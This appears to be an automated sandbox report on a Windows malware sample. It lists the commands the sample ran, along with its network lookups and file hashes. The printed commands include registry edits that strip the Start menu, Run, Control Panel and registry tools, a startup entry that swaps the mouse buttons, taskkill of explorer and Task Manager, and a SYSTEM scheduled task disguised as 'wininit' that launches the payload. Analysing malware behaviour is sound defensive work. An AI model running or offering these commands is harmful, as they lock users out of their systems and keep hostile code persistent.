C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f

C:\Windows\system32\rundll32.exe

rundll32 user32, SwapMouseButton

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f

C:\Windows\system32\taskkill.exe

taskkill /IM explorer.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM taskmgr.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM notepad.exe /F

C:\Users\Admin\AppData\Local\Temp\50DF.tmp\2.exe

2.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\50DF.tmp\2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3484 -ip 3484

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 524

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

memory/3528-0-0x0000000000400000-0x0000000000443000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\50DF.tmp\50E0.bat

MD5 1f7a5456ca38839ec9e112425e7fa747
SHA1 8019978db5a80de11bb32463aa7160bb4a4d6b8a
SHA256 f955addebe88273b07cd9db9484f6aaaff58bec7f06898f8cdf224fa8b9cecb6
SHA512 eb57e75f96b7c663af44015e4dca2d6d07d9fed0db609bb6bad790093d0cef69e30ea6bb31093dd505af82a873c7a12f4bfcebe6f68938728d30053fff7c0818

memory/3528-5-0x0000000000400000-0x0000000000443000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\50DF.tmp\2.exe

MD5 4bc20c24fbea4588741203c77126c7b3
SHA1 5f2d2fec4e1d7c752be551363743069d9a4e7510
SHA256 4cd2ce15d0752711a76118fba8046193a1847c85a3278410191c0a015b387be3
SHA512 3e508012250ad6115e49b059a7fc103274190be425403df7081aa3e4caf130b9fa685c3228cafb6a031c121acdd95d72c1f5180f42caea55213a7bd9de71b31f

memory/3528-9-0x0000000000400000-0x0000000000443000-memory.dmp

memory/3484-10-0x0000000000400000-0x000000000043B000-memory.dmp